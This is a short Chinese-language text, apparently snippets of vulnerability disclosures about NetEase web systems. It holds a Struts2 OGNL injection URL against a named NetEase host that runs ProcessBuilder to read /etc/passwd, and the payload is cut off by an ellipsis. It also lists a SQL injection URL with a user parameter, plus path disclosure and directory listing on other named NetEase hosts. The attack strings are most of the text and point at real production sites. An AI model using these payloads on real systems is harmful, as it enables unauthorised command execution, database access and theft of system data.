网易某系统命令执行,经典Struts2漏洞复现,如下图: http://analytics.ws.netease.com/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,…
1、SQL注入 http://minisite.163.com/2006/0615/abbott/page09.php?userID=209 ,如图 2、爆路径 3、列目录 http://cms.netease.com:9039/